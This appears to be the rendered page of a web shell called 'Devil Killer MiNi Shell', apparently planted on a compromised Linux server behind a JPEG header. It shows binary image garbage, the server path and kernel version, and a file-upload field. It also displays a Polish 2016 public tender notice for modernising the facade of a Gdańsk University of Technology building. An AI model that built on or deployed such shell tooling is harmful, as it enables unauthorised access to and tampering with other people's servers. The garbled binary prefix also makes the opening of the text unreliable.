JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161215/367603-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.dzp.pg.gda.pl' target='_blank'>http://www.dzp.pg.gda.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 367603 - 2016
              z dnia 2016-12-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gdańsk: Modernizacja elewacji budynku A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej w Gdańsku, ul. G. Narutowicza 11/12<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Politechnika Gdańska Wydział Elektroniki, Telekomunikacji i Informatyki, krajowy numer identyfikacyjny
              162000000, ul.
              ul. Narutowicza 
              42686,
              80233  
              Gdańsk, woj.
              pomorskie, państwo
              Polska, tel.
              +48 58 348 61 52, e-mail
              boguslawa.litwinska@eti.pg.gda.pl, faks
              +48 58 347 24 45.
              <br />
              Adres strony internetowej (URL): www.dzp.pg.gda.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                www.pg.edu.pl</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Uczelnia publiczna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.dzp.pg.gda.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.dzp.pg.gda.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Forma pisemna<br />
                Adres:
                <br />Politechnika Gdańsa Wydział Elektroiki, Telekomunikaji i Informatyki, ul. Narutowicza 11/12 80-233 Gdńsk, budynek WETI A  pok. 127</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Modernizacja elewacji budynku A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej w Gdańsku, ul. G. Narutowicza 11/12<br /><b>Numer referencyjny: </b>CRZP/303/009/R/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.1.	Przedmiotem zamówienia jest  Modernizacja elewacji budynku A Wydziału Elektroniki, Telekomunikacji i Informatyki Politechniki Gdańskiej w Gdańsku, ul. G. Narutowicza 11/12.
1.2.	Zakres prac obejmuje remont:
1.2.1. W zakresie termomodernizacji i elewacji budynku:
         Termomodernizację ścian zewnętrznych budynku:
         - gmach główny budynku A wydziału ETI,
         - wieżę,
         - łącznik do wieży,
         - elewację wschodnią łącznika prowadzącego do audytoriów.
         Zakładanie kurtyn powietrznych:
      - założenie na oknach elewacji południowej żaluzji przeciwsłonecznych,
      - wykonanie perforowanej fasady kurtynowej na elewacji północnej i południowej. 

1.2.2. W zakresie zagospodarowania terenu:
         - dodatkowy fragment chodnika,
         - elementy małej architektury,
         - zabezpieczenie w formie drenażu ściany zachodniej i zejścia do piwnicy przed 
           wodami opadowymi,
         - podświetlenie zieleni,

1.2.3. Dane liczbowe dla remontowanego budynku :
                             - powierzchnia zabudowy  	                                        2668 m2
        - kubatura budynku		                              58332 m3
        - długość budynku 		                              114,51 m
        - szerokość budynku (gmachu głównego)	 13,80 m
        - ilość kondygnacji nadziemnych		 od 8 do 10 
        - ilość kondygnacji podziemnych		 1 
        - wysokość budynku			 29,88 m
1.2.4. Nie objęte robotami budowlanymi są następujące elementy budynku:
         - stropodachy,
         - elewacje audytoriów,
         - elewacja zachodnia łącznika prowadzącego do audytoriów,
         - okna i przeszklenia,
         - Wejścia do budynku gmachu głównego w elewacji północnej

1.2.5. Rozbiórki
Do rozbiórek przewidziane są następujące elementy budynku:
- w elewacji południowej wieży - schody, pochylnia, zadaszenie i część chodnika przy 
  wejściu,
- w elewacji zachodniej - schody i pochylnia do poziomu piwnic, schody prowadzące na 
  poziom parteru, oraz część chodnika,
- na elewacji wschodniej -  balkony,

1.2.6. Opis elementów budynku objętych robotami budowlanymi:
- ściany zewnętrzne gmachu głównego,
- ściany zewnętrzne wieży oraz łącznika z wieżą,
- ściana wschodnia łącznika z audytoriami,
- parapety, obróbki blacharskie, rury spustowe, kratki wentylacyjne
- instalacja odgromowa.
- nowe balustrady przy schodach, przeszkleniach i portfenetry,
- oświetlenie zewnętrzne na elewacjach gmachu głównego, łącznikach oraz wieży
- dodatkowe nowe oświetlenie na elewacji gmachu głównego 
- schody, pochylnia i zadaszenie przy wejściu do wieży,
- w szczytowej zachodniej ścianie, schody i pochylnia do poziomu piwnic oraz schody 
  prowadzące na poziom parteru przy wejściu do gmachu głównego.

1.3. Opis ogólny
       1.3.1. . Projekt zakłada:
         - termomodernizację ścian zewnętrznych budynku wraz z projektem elewacji:
           ścian gmachu głównego,
           ścian wieży,
           ścian łącznika z wieżą 
           ściany wschodniej łącznika do audytoriów,
         - założenie na oknach elewacji południowej żaluzji przeciwsłonecznych,
         - wykonanie perforowanej fasady kurtynowej na elewacji północnej i południowej,
         - zagospodarowanie terenu.
         Bryła budynku zostanie zachowana. 

      1.3.2. Nową fasadę, odsuniętą od istniejących ścian elewacji Pn i Pd. 
               Dodatkowa fasada składa się z aluminiowych perforowanych paneli w nieregularnym 
               układzie, podkreślających istniejący poziomy podział pasami okiennymi na elewacji 
               budynku. W części paneli perforowanych zostanie uzyskany wzór, poprzez 
               zróżnicowanie wielkości otworów w płycie. Wzór został dobrany zgodnie z  
               teletechniczno - informatycznym charakterem budynku. Panele elewacyjne będą 
    mocowane do żelbetowych słupów w ścianach zewnętrznych budynku za pomocą 
                systemowych rusztowań oraz projektowanej stalowej podkonstrukcji.

       1.3.3. Doświetlenie bezpośrednie okien wszystkich pomieszczeń biurowych i dydaktycznych  
                zostanie zachowane. Kurtyna elewacyjna częściowo przysłania okna klatek schodowych,       
                pomieszczeń technicznych, laboratoriów i toalet. 

       1.3.4. Dodatkowe oświetlenie na elewacji Pn i Pd, w postaci opraw oświetleniowych podświetlających      
                projektowaną fasadę budynku.

       1.3.5. Wymianę istniejących lamp zewnętrznych na nowe, na elewacjach gmachu głównego, oraz 
                wieży oraz ścianie wschodniej łącznika z audytorium.

       1.3.6. Na elewacji południowej w pasach okien pomieszczeń biurowych, dydaktycznych i laboratoriów 
                projektuje się dodatkową osłonę przed promieniami słonecznymi, w postaci systemowych 
                żaluzji zewnętrznych.

       1.3.7. Modernizację wejścia do wieży. Projektuje się nowe schody, pochylnie i zadaszenie. 

       1.3.8. Modernizację wejścia w zachodniej ścianie szczytowej. Projektuje się  nowe schody 
                i pochylnie do poziomu piwnic oraz schody prowadzące na poziom parteru przy wejściu 
                do gmachu głównego w zachodniej ścianie szczytowej.

       1.3.9. Dodatkowy chodnik z płytek betonowych przy narożniku południowo-wschodnim 
                budynku. 

       1.3.10. Odtworzenie opaski wokół budynku po robotach związanych z montażem izolacji ścian 
                 zewnętrznych. 
       1.3.11. Lokalizację elementów małej architektury w postaci ławek i koszy na śmieci.

       1.3.12. Podświetlenie istniejącej zieleni przy elewacji północnej.

       1.3.13. Nasadzenia krzewów.
<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45200000-9,
                45210000-2,
                45211000-9,
                45211340-4,
                45111100-9,
                45400000-1,
                45300000-0,
                45310000-3,
                45311000-0,
                45316000-5,
                45317000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              6061730.31<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 210<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Nieprzekraczalny termin wykonania zamówienia: max 210 dni licząc od dnia rozpoczęcia robót
            budowlanych.
            Rozpoczęcie robót budowlanych nastąpi w dniu  01.03.2017 r.

            Uwaga! Termin realizacji zamówienia jest jednym z kryteriów oceny ofert i podlega ocenie
                        punktowej. W przypadku nie wpisania na druku oferty terminu Zamawiający uzna,
                        iż Wykonawca oświadcza, że zrealizuje zamówienie w terminie 210 dni licząc od dnia 
                        rozpoczęcia robót budowlanych.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                5.3.3.	Wykonawca spełni warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w pkt 5.2.1. lit. c) SIWZ, jeżeli wykaże, że:

a)	wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty polegające na wykonaniu robót termomodernizacyjnych elewacji w obiektach użyteczności publicznej o wysokości powyżej 25 m, o wartości łącznej nie mniejszej niż 1 300 000,00 PLN brutto, w tym wartość 1 roboty nie mniejsza niż 600 000,00 złotych
b)	wykonał nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty polegające na wykonaniu fasad wentylowanych w obiektach użyteczności publicznej o wysokości powyżej 25 m, o wartości łącznej nie mniejszej niż 1 300 000,00 PLN brutto, w tym wartość jednej roboty nie mniejsza niż 600 000,00 złotych
c)	dysponuje następującym osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami budowlanymi:
	osobą  posiadającą  uprawnienia  budowlane  do  kierowania  robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń,
	osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych bez ograniczeń


<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                1. W przypadku warunku zdolności technicznej lub zawodowej, w zakresie dysponowania osobami skierowanymi przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami budowlanymi, zamawiający uznaje wymagane uprawnienia do kierowania robotami budowlanymi określone w rozporządzeniu Ministra Infrastruktury i rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r., poz. 1278) oraz uprawnienia obowiązujące wydane na podstawie wcześniej obowiązujących przepisów prawnych, a także zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2016 r., poz. 290,  z późn. zm.), zamawiający uznaje również wymagane uprawnienia budowlane do kierowania robotami budowlanymi nabyte w innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65).

2. W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a ust. 2 ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów  oraz inżynierów budownictwa (Dz.U. z 2014 r. poz. 1946, z późn. zm.), osoby wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane do kierowania robotami budowlanymi, jeżeli:

a)	nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do kierowania robotami budowlanymi, oraz

b)	posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku braku decyzji o uznaniu kwalifikacji zawodowych - zostały spełnione w stosunku do tych osób wymagania, o których mowa w art. 20a ust. 2-6  ustawy z dnia 15  grudnia 2000r. o  samorządach zawodowych architektów oraz inżynierów budownictwa, dotyczące świadczenia usług transgranicznych.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.Wzór oświadczenia stanowi załącznik nr 7 do SIWZ. </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty; Wzór  wykazu wykonanych robót budowlanych stanowi Załącznik nr 4 do SIWZ
2. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych (posiadanych uprawnień do kierowania robotami budowlanymi) i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór  wykazu osób stanowi Załącznik nr 5 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Zgodnie z art. 22a ust. 1 Pzp wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
2.Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a Pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt III.4.
3.Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Zamawiający żąda wniesienia wadium w kwocie 180 000, 00 (słownie: sto osiemdziesiąt tysięcy złotych) zł.

2.	Wadium wnosi się przed upływem terminu składania ofert.

